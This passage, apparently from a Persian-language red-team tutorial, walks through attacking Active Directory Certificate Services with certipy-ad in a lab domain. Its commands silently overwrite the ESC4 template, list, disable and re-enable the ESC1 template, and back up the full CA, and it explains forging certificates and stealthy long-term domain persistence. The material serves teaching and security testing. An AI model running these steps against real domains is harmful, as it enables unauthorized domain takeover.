                                \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u0642\u0627\u0644\u0628 (template) \u0645\u0648\u0631\u062f \u0646\u0638\u0631 \u0631\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0641\u0627\u06cc\u0644 JSON \u0630\u062e\u06cc\u0631\u0647\u200c\u0634\u062f\u0647 \u0627\u0632 \u0642\u0628\u0644 \u0628\u0627\u0632\u0646\u0648\u06cc\u0633\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0641\u0644\u06af -no-save \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u0627\u06cc\u0646 \u0628\u0627\u0632\u0646\u0648\u06cc\u0633\u06cc \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u0628\u06cc\u200c\u0635\u062f\u0627 (silent) \u0627\u0646\u062c\u0627\u0645 \u0634\u062f\u0647 \u0648 \u0646\u0633\u062e\u0647 \u0641\u0639\u0644\u06cc \u0642\u0627\u0644\u0628 \u0645\u062c\u062f\u062f\u0627\u064b \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u200c\u06af\u06cc\u0631\u06cc (backup) \u0646\u0634\u0648\u062f.<\/span><\/p>\n
                                certipy-ad template -u raj -p Password@1 -dc-ip 192.168.1.20 -template ESC4 -write-configuration backup.json -no-save<\/span><\/pre>\n
                                \u062a\u0648\u0636\u06cc\u062d \u0641\u0646\u06cc<\/strong>:<\/strong><\/span>
                                \n\u062f\u0631 \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u0627\u0628\u0632\u0627\u0631 certipy-ad \u0628\u0631\u0627\u06cc \u0628\u0627\u0632\u0646\u0648\u06cc\u0633\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u06cc\u06a9 \u0642\u0627\u0644\u0628 Active Directory Certificate Services (AD CS) \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f. \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06af\u0632\u06cc\u0646\u0647 -write-configuration \u0647\u0645\u0631\u0627\u0647 \u0628\u0627 \u0641\u0627\u06cc\u0644 backup.json\u060c \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u0627\u0632 \u067e\u06cc\u0634 \u0630\u062e\u06cc\u0631\u0647\u200c\u0634\u062f\u0647 \u0645\u062c\u062f\u062f\u0627\u064b \u0631\u0648\u06cc \u0642\u0627\u0644\u0628 \u0645\u0634\u062e\u0635\u200c\u0634\u062f\u0647 \u0628\u0627 -template ESC4 \u0627\u0639\u0645\u0627\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f. \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0641\u0644\u06af -no-save \u0627\u0632 \u0627\u06cc\u062c\u0627\u062f \u0646\u0633\u062e\u0647 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646 \u062c\u062f\u06cc\u062f \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f \u062a\u0627 \u0639\u0645\u0644\u06cc\u0627\u062a \u0628\u062f\u0648\u0646 \u062b\u0628\u062a \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a \u062c\u062f\u06cc\u062f \u062f\u0631 \u0641\u0627\u06cc\u0644 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646 \u0627\u0646\u062c\u0627\u0645 \u06af\u06cc\u0631\u062f\u2014\u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0645\u0639\u0645\u0648\u0644\u0627\u064b \u062f\u0631 \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc \u062d\u0645\u0644\u0647 \u06cc\u0627 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0645\u062e\u0641\u06cc\u0627\u0646\u0647 \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n
                                \"\"<\/span><\/p>\n
                                \u0646\u06a9\u062a\u0647<\/strong>:<\/strong><\/span><\/p>\n
                                \u0627\u06cc\u0646 \u0639\u0645\u0644\u06cc\u0627\u062a\u060c \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0634\u0646\u0627\u062e\u062a\u0647\u200c\u0634\u062f\u0647 \u0631\u0627 \u0645\u062c\u062f\u062f\u0627\u064b \u0631\u0648\u06cc \u06cc\u06a9 \u0642\u0627\u0644\u0628 (template) \u0627\u0639\u0645\u0627\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0627\u0645\u06a9\u0627\u0646 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc\u200c\u0647\u0627\u06cc \u0622\u062a\u06cc \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc \u062f\u06cc\u062c\u06cc\u062a\u0627\u0644 (certificate-based exploits) \u0645\u0627\u0646\u0646\u062f \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc ESC1 \u06cc\u0627 ESC4 \u0631\u0627 \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u0627\u062f\u0645\u06cc\u0646 CA (Certificate Authority) \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f.<\/span><\/p>\n
                                \u0634\u0645\u0627\u0631\u0634<\/strong> (Enumeration) <\/strong>\u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631<\/strong> CA<\/strong><\/span><\/p>\n
                                \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u062a\u0645\u0627\u0645 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc\u06cc \u0631\u0627 \u06a9\u0647 \u062f\u0631 \u062d\u0627\u0644 \u062d\u0627\u0636\u0631 \u062a\u0648\u0633\u0637 CA (Certificate Authority) \u0645\u0646\u062a\u0634\u0631 \u0634\u062f\u0647\u200c\u0627\u0646\u062f\u060c \u0641\u0647\u0631\u0633\u062a \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/span><\/p>\n
                                certipy-ad ca -u sanjeet -p Password@12 -dc-ip 192.168.1.20 -target 192.168.1.20 -list-template -ca ignite-DC01-CA<\/span><\/pre>\n
                                \u062a\u0648\u0636\u06cc\u062d \u0641\u0646\u06cc:<\/span>
                                \n\u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0628\u0647 \u0645\u0627 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u0628\u0631\u0631\u0633\u06cc \u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u0622\u06cc\u0627 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0647\u062f\u0641 \u0645\u0627\u0646\u0646\u062f ESC1 \u06cc\u0627 ESC4 \u062f\u0631 \u062d\u0627\u0644 \u062d\u0627\u0636\u0631 \u0641\u0639\u0627\u0644 \u0647\u0633\u062a\u0646\u062f \u06cc\u0627 \u062e\u06cc\u0631. \u0647\u0645\u0686\u0646\u06cc\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0628\u0627 \u0627\u06cc\u0646 \u0631\u0648\u0634 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u062f\u06cc\u06af\u0631\u06cc \u0631\u0627 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u06a9\u0631\u062f \u06a9\u0647 \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0642\u0627\u0628\u0644\u06cc\u062a \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc (exploitable) \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u0646\u062f \u0648 \u0628\u0631\u0627\u06cc \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 (abuse) \u062f\u0631 \u062d\u0645\u0644\u0627\u062a \u0622\u06cc\u0646\u062f\u0647 \u0645\u0646\u0627\u0633\u0628 \u0628\u0627\u0634\u0646\u062f.<\/span><\/p>\n
                                \"\"<\/span><\/p>\n
                                \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc \u06cc\u06a9 \u0642\u0627\u0644\u0628<\/strong> (Template)<\/strong><\/span><\/p>\n
                                \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0628\u0647 \u0645\u0627 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u0642\u0627\u0644\u0628 ESC1 \u0631\u0627 \u0627\u0632 \u0641\u0647\u0631\u0633\u062a \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0645\u0646\u062a\u0634\u0631\u0634\u062f\u0647 \u062a\u0648\u0633\u0637 CA (Certificate Authority) \u063a\u06cc\u0631\u0641\u0639\u0627\u0644 \u06a9\u0646\u06cc\u0645:<\/span><\/p>\n
                                certipy-ad ca -u sanjeet -p Password@12 -dc-ip 192.168.1.20 -target 192.168.1.20 -disable ESC1 -ca ignite-DC01-CA<\/span><\/pre>\n
                                \u062a\u0648\u0636\u06cc\u062d \u0641\u0646\u06cc<\/strong>:<\/strong><\/span>
                                \n\u062f\u0631 \u0627\u06cc\u0646 \u0633\u0646\u0627\u0631\u06cc\u0648\u060c \u0627\u0628\u0632\u0627\u0631 certipy-ad \u0628\u0631\u0627\u06cc \u0628\u0631\u0642\u0631\u0627\u0631\u06cc \u0627\u0631\u062a\u0628\u0627\u0637 \u0628\u0627 CA \u0648 \u0627\u062c\u0631\u0627\u06cc \u0639\u0645\u0644\u06cc\u0627\u062a \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc \u0642\u0627\u0644\u0628 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f. \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06af\u0632\u06cc\u0646\u0647 -disable ESC1 \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u0642\u0627\u0644\u0628 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 ESC1 \u0627\u0632 \u0641\u0647\u0631\u0633\u062a \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0641\u0639\u0627\u0644 \u0648 \u0642\u0627\u0628\u0644 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u062d\u0630\u0641 \u0634\u0648\u062f. \u0627\u06cc\u0646 \u0627\u0642\u062f\u0627\u0645 \u0645\u0639\u0645\u0648\u0644\u0627\u064b \u0628\u0631\u0627\u06cc \u06a9\u0627\u0647\u0634 \u0633\u0637\u062d \u062d\u0645\u0644\u0647 (attack surface) \u062f\u0631 \u0645\u062d\u06cc\u0637\u200c\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u06cc\u0627 \u067e\u0633 \u0627\u0632 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u06cc\u06a9 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0645\u0648\u0641\u0642 \u0627\u0632 \u0642\u0627\u0644\u0628 \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f.<\/span><\/p>\n
                                \"\"<\/span><\/p>\n
                                \u0646\u06a9\u062a\u0647<\/strong>:<\/strong><\/span><\/p>\n
                                \u062a\u06cc\u0645\u200c\u0647\u0627\u06cc \u0622\u0628\u06cc (Blue Teams) \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0627\u0632 \u0627\u06cc\u0646 \u0631\u0648\u0634 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u0628\u062e\u0634\u06cc \u0627\u0632 \u0641\u0631\u0622\u06cc\u0646\u062f \u0627\u0635\u0644\u0627\u062d \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc (remediation) \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u0646\u062f. \u062f\u0631 \u0645\u0642\u0627\u0628\u0644\u060c \u062a\u06cc\u0645\u200c\u0647\u0627\u06cc \u0642\u0631\u0645\u0632 (Red Teams) \u0645\u0645\u06a9\u0646 \u0627\u0633\u062a \u0627\u0632 \u0622\u0646 \u0628\u0631\u0627\u06cc \u0645\u062e\u062a\u0644\u200c\u06a9\u0631\u062f\u0646 \u0641\u0631\u0622\u06cc\u0646\u062f \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc (detection disruption) \u0628\u0647\u0631\u0647 \u0628\u0628\u0631\u0646\u062f. \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0628\u0627 \u0647\u062f\u0641 \u0642\u0637\u0639 \u0632\u0646\u062c\u06cc\u0631\u0647 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc (exploit chain) \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u0645\u0648\u0642\u062a \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u06af\u06cc\u0631\u062f \u062a\u0627 \u062f\u0631 \u0632\u0645\u0627\u0646 \u0645\u0646\u0627\u0633\u0628 \u0645\u062c\u062f\u062f\u0627\u064b \u0627\u0632 \u0622\u0646 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0634\u0648\u062f (\u0647\u0645\u0627\u0646\u200c\u0637\u0648\u0631 \u06a9\u0647 \u062f\u0631 \u0633\u0646\u0627\u0631\u06cc\u0648\u06cc \u0645\u0627 \u0627\u062a\u0641\u0627\u0642 \u0627\u0641\u062a\u0627\u062f\u0647 \u0627\u0633\u062a).<\/span><\/p>\n
                                \u0628\u0631\u0631\u0633\u06cc \u0648\u0636\u0639\u06cc\u062a \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc \u0642\u0627\u0644\u0628<\/strong><\/span><\/p>\n
                                \u0628\u0631\u0627\u06cc \u0628\u0631\u0631\u0633\u06cc \u0627\u06cc\u0646\u06a9\u0647 \u0622\u06cc\u0627 \u0642\u0627\u0644\u0628 ESC1 \u0628\u0647\u200c\u062f\u0631\u0633\u062a\u06cc \u063a\u06cc\u0631\u0641\u0639\u0627\u0644 \u0634\u062f\u0647 \u0627\u0633\u062a \u06cc\u0627 \u062e\u06cc\u0631\u060c \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u062f\u0633\u062a\u0648\u0631 \u0632\u06cc\u0631 \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u06cc\u0645:<\/span><\/p>\n
                                certipy-ad ca -u sanjeet -p Password@12 -dc-ip 192.168.1.20 -target 192.168.1.20 -list-templates -ca ignite-DC01-CA<\/span><\/pre>\n
                                \u0646\u062a\u06cc\u062c\u0647<\/strong>:<\/strong><\/span>
                                \n\u062f\u0631 \u062e\u0631\u0648\u062c\u06cc \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0645\u0634\u0627\u0647\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0642\u0627\u0644\u0628 ESC1 \u062f\u06cc\u06af\u0631 \u062f\u0631 \u0645\u06cc\u0627\u0646 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0641\u0639\u0627\u0644 (enabled templates) \u0645\u0648\u062c\u0648\u062f \u062f\u0631 CA \u0644\u06cc\u0633\u062a \u0646\u0634\u062f\u0647 \u0627\u0633\u062a\u060c \u06a9\u0647 \u062a\u0623\u06cc\u06cc\u062f \u0645\u06cc\u200c\u06a9\u0646\u062f \u0641\u0631\u0622\u06cc\u0646\u062f \u063a\u06cc\u0631\u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc \u0645\u0648\u0641\u0642 \u0628\u0648\u062f\u0647 \u0627\u0633\u062a.<\/span><\/p>\n
                                \"\"<\/span><\/p>\n
                                \u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc \u0645\u062c\u062f\u062f \u06cc\u06a9 \u0642\u0627\u0644\u0628<\/strong> (Re-Enable a Template)<\/strong><\/span><\/p>\n
                                \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u0642\u0627\u0644\u0628 ESC1 \u06a9\u0647 \u0642\u0628\u0644\u0627\u064b \u063a\u06cc\u0631\u0641\u0639\u0627\u0644 \u0634\u062f\u0647 \u0628\u0648\u062f \u0631\u0627 \u062f\u0648\u0628\u0627\u0631\u0647 \u0641\u0639\u0627\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/span><\/p>\n
                                certipy-ad ca -u sanjeet -p Password@12 -dc-ip 192.168.1.20 -target 192.168.1.20 -enable ESC1 -ca ignite-DC01-CA<\/span><\/pre>\n
                                 <\/p>\n
                                \u062a\u0648\u0636\u06cc\u062d \u0641\u0646\u06cc<\/strong>:<\/strong><\/span>
                                \n\u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0628\u0647 \u0645\u0627 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u0642\u0627\u0644\u0628 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 ESC1 \u0631\u0627 \u0645\u062c\u062f\u062f\u0627\u064b \u062f\u0631 \u0644\u06cc\u0633\u062a \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0641\u0639\u0627\u0644 CA \u0642\u0631\u0627\u0631 \u062f\u0647\u06cc\u0645.<\/span><\/p>\n
                                \u0647\u0645\u0627\u0646\u200c\u0637\u0648\u0631 \u06a9\u0647 \u067e\u06cc\u0634\u200c\u062a\u0631 \u0627\u0634\u0627\u0631\u0647 \u0634\u062f\u060c \u0627\u06cc\u0646 \u0627\u0642\u062f\u0627\u0645 \u0628\u0647 \u0645\u0627 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u0632\u0646\u062c\u06cc\u0631\u0647 \u062d\u0645\u0644\u0647 \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc \u062f\u06cc\u062c\u06cc\u062a\u0627\u0644 (certificate attack chain) \u0631\u0627 \u0645\u062c\u062f\u062f\u0627\u064b \u0631\u0627\u0647\u200c\u0627\u0646\u062f\u0627\u0632\u06cc \u06a9\u0646\u06cc\u0645.<\/span><\/p>\n
                                \u0627\u06cc\u0646 \u0631\u0648\u0634 \u0628\u0647\u200c\u0648\u06cc\u0698\u0647 \u062f\u0631 \u0634\u0631\u0627\u06cc\u0637\u06cc \u06a9\u0627\u0631\u0628\u0631\u062f \u062f\u0627\u0631\u062f \u06a9\u0647 \u0645\u062f\u0627\u0641\u0639\u0627\u0646 (defenders) \u0632\u0646\u062c\u06cc\u0631\u0647 \u062d\u0645\u0644\u0647 \u0631\u0627 \u0642\u0637\u0639 \u06a9\u0631\u062f\u0647\u200c\u0627\u0646\u062f. \u062f\u0631 \u0686\u0646\u06cc\u0646 \u0634\u0631\u0627\u06cc\u0637\u06cc\u060c \u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc \u0645\u062c\u062f\u062f \u0642\u0627\u0644\u0628 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062f\u0631 \u062d\u0645\u0644\u0627\u062a \u062a\u06a9\u0631\u0627\u0631\u06cc Red Team \u06cc\u0627 \u0627\u06cc\u062c\u0627\u062f \u067e\u0627\u06cc\u062f\u0627\u0631\u06cc \u0628\u0644\u0646\u062f\u0645\u062f\u062a (long-term persistence) \u062f\u0631 \u0645\u062d\u06cc\u0637 \u0647\u062f\u0641 \u0645\u0648\u0631\u062f \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0642\u0631\u0627\u0631 \u06af\u06cc\u0631\u062f.<\/span><\/p>\n
                                \"\"<\/span><\/p>\n
                                \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u200c\u06af\u06cc\u0631\u06cc \u06a9\u0627\u0645\u0644 \u0627\u0632<\/strong> CA (Full CA Backup)<\/strong><\/span><\/p>\n
                                \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u0627\u0632 \u06a9\u0644 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc CA (Certificate Authority) \u0634\u0627\u0645\u0644 \u0642\u0627\u0644\u0628\u200c\u0647\u0627 (templates)\u060c \u0645\u062c\u0648\u0632\u0647\u0627 (permissions) \u0648 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a (settings) \u0646\u0633\u062e\u0647 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646 \u062a\u0647\u06cc\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/span><\/p>\n
                                certipy-ad ca -backup -u sanjeet -p Password@12 -dc-ip 192.168.1.20 -target 192.168.1.20 -ca ignite-DC01-CA<\/span><\/pre>\n
                                 <\/p>\n
                                \u062a\u0648\u0636\u06cc\u062d \u0641\u0646\u06cc<\/strong>:<\/strong><\/span>
                                \n\u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u062f\u06cc\u062f \u06a9\u0627\u0645\u0644 (full visibility) \u0646\u0633\u0628\u062a \u0628\u0647 \u0648\u0636\u0639\u06cc\u062a \u0641\u0639\u0644\u06cc \u0639\u0645\u0644\u06a9\u0631\u062f CA \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0627\u06cc\u0646 \u0627\u0637\u0644\u0627\u0639\u0627\u062a \u0628\u0647 \u0645\u0627 \u0627\u0645\u06a9\u0627\u0646 \u0645\u06cc\u200c\u062f\u0647\u062f \u062a\u0627 \u062a\u0635\u0645\u06cc\u0645 \u0628\u06af\u06cc\u0631\u06cc\u0645 \u06a9\u0647 \u0622\u06cc\u0627 \u0645\u06cc\u200c\u062e\u0648\u0627\u0647\u06cc\u0645 \u0648\u0636\u0639\u06cc\u062a CA \u0631\u0627:<\/span><\/p>\n
                                  \n
                                • \u062a\u063a\u06cc\u06cc\u0631 (modify) \u062f\u0647\u06cc\u0645<\/span><\/li>\n
                                • \u0627\u0633\u062a\u062e\u0631\u0627\u062c (exfiltrate) \u06a9\u0646\u06cc\u0645<\/span><\/li>\n
                                • \u06cc\u0627 \u0628\u0627 \u06cc\u06a9 \u0646\u0633\u062e\u0647 \u062c\u0639\u0644\u06cc \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 (replace) \u0646\u0645\u0627\u06cc\u06cc\u0645<\/span><\/li>\n<\/ul>\n
                                  \u0627\u06cc\u0646 \u0639\u0645\u0644\u06cc\u0627\u062a \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u062f \u062f\u0631 \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc\u06cc \u0645\u0627\u0646\u0646\u062f \u062c\u0639\u0644 \u0642\u0627\u0644\u0628\u200c\u0647\u0627 (template forgery)\u060c \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u0637\u0644\u0627\u06cc\u06cc (Golden Certificate)\u060c \u06cc\u0627 \u0628\u0627\u0632\u06af\u0631\u062f\u0627\u0646\u062f\u0646 \u0648\u0636\u0639\u06cc\u062a \u0642\u0628\u0644\u06cc \u062c\u0647\u062a \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc (rollback exploits) \u0628\u0647\u200c\u06a9\u0627\u0631 \u0631\u0648\u062f.<\/span><\/p>\n
                                  \u0646\u0642\u0637\u0647 \u0627\u0648\u062c \u062d\u0645\u0644\u0647: \u062a\u0633\u0644\u0637 \u0628\u0631 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a<\/strong><\/span><\/p>\n
                                  \u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647 \u0627\u0632 \u062d\u0645\u0644\u0647\u060c \u062f\u06cc\u06af\u0631 \u0635\u0631\u0641\u0627\u064b \u0628\u0647 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627 \u0645\u062a\u06a9\u06cc \u0646\u06cc\u0633\u062a\u06cc\u0645. \u0628\u0644\u06a9\u0647 \u06a9\u0646\u062a\u0631\u0644 \u0645\u0633\u062a\u0642\u06cc\u0645 \u0628\u0631 \u0646\u062d\u0648\u0647 \u062a\u0648\u0632\u06cc\u0639 \u0627\u0639\u062a\u0645\u0627\u062f \u062f\u06cc\u062c\u06cc\u062a\u0627\u0644 (digital trust) \u062f\u0631 \u0633\u0637\u062d \u062f\u0627\u0645\u0646\u0647 (domain) \u0628\u0647\u200c\u062f\u0633\u062a \u0622\u0645\u062f\u0647 \u0627\u0633\u062a. \u0627\u06cc\u0646 \u0645\u0648\u0636\u0648\u0639 \u0646\u0634\u0627\u0646\u200c\u062f\u0647\u0646\u062f\u0647 \u0646\u0641\u0648\u0630 \u0639\u0645\u06cc\u0642 \u0628\u0647 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0627\u0645\u0646\u06cc\u062a\u06cc \u0633\u0627\u0632\u0645\u0627\u0646 \u0648 \u062a\u0633\u0644\u0637 \u0628\u0631 \u06cc\u06a9\u06cc \u0627\u0632 \u062d\u06cc\u0627\u062a\u06cc\u200c\u062a\u0631\u06cc\u0646 \u0645\u0624\u0644\u0641\u0647\u200c\u0647\u0627\u06cc \u0622\u0646 \u06cc\u0639\u0646\u06cc \u0633\u0631\u0648\u06cc\u0633 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc \u0627\u0633\u062a.<\/span><\/p>\n
                                  \"\"<\/span><\/p>\n
                                  \u0646\u06a9\u062a\u0647<\/strong>:<\/strong><\/span><\/p>\n
                                  \u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647\u060c \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 AD CS \u0627\u0632 \u06cc\u06a9 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0644\u062d\u0638\u0647\u200c\u0627\u06cc (one-time exploit) \u0628\u0647 \u06cc\u06a9 \u0627\u0633\u062a\u0631\u0627\u062a\u0698\u06cc \u0645\u0627\u0646\u062f\u06af\u0627\u0631\u06cc \u0645\u062e\u0641\u06cc\u0627\u0646\u0647 \u0648 \u0628\u0644\u0646\u062f\u0645\u062f\u062a \u062f\u0631 \u062f\u0627\u0645\u0646\u0647 (long-term, stealthy domain persistence) \u062a\u0628\u062f\u06cc\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n
                                  \u062c\u0639\u0644 \u0648 \u0631\u0644\u0647 \u06a9\u0631\u062f\u0646 \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627<\/strong> (Forging & Relaying Certificates)<\/strong><\/span><\/p>\n
                                  \u0628\u0627 \u062f\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631 \u062f\u0627\u0634\u062a\u0646 \u06a9\u0644\u06cc\u062f \u062e\u0635\u0648\u0635\u06cc CA\u060c \u0645\u0627 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u06cc\u06a9 \u06af\u0648\u0627\u0647\u06cc \u062f\u06cc\u062c\u06cc\u062a\u0627\u0644 \u062c\u0639\u0644 \u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u0647\u0648\u06cc\u062a Domain Administrator \u0631\u0627 \u0634\u0628\u06cc\u0647\u200c\u0633\u0627\u0632\u06cc (impersonate) \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0647\u0645\u0686\u0646\u06cc\u0646 \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0627\u0632 \u0637\u0631\u06cc\u0642 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u060c \u0627\u0642\u062f\u0627\u0645 \u0628\u0647 \u062f\u0631\u062e\u0648\u0627\u0633\u062a \u06af\u0648\u0627\u0647\u06cc SubCA \u06a9\u0631\u062f\u0647 \u0648 \u0622\u0646 \u0631\u0627 \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u062f\u0633\u062a\u06cc \u062a\u0623\u06cc\u06cc\u062f (approve) \u06a9\u0646\u06cc\u0645.<\/span><\/p>\n
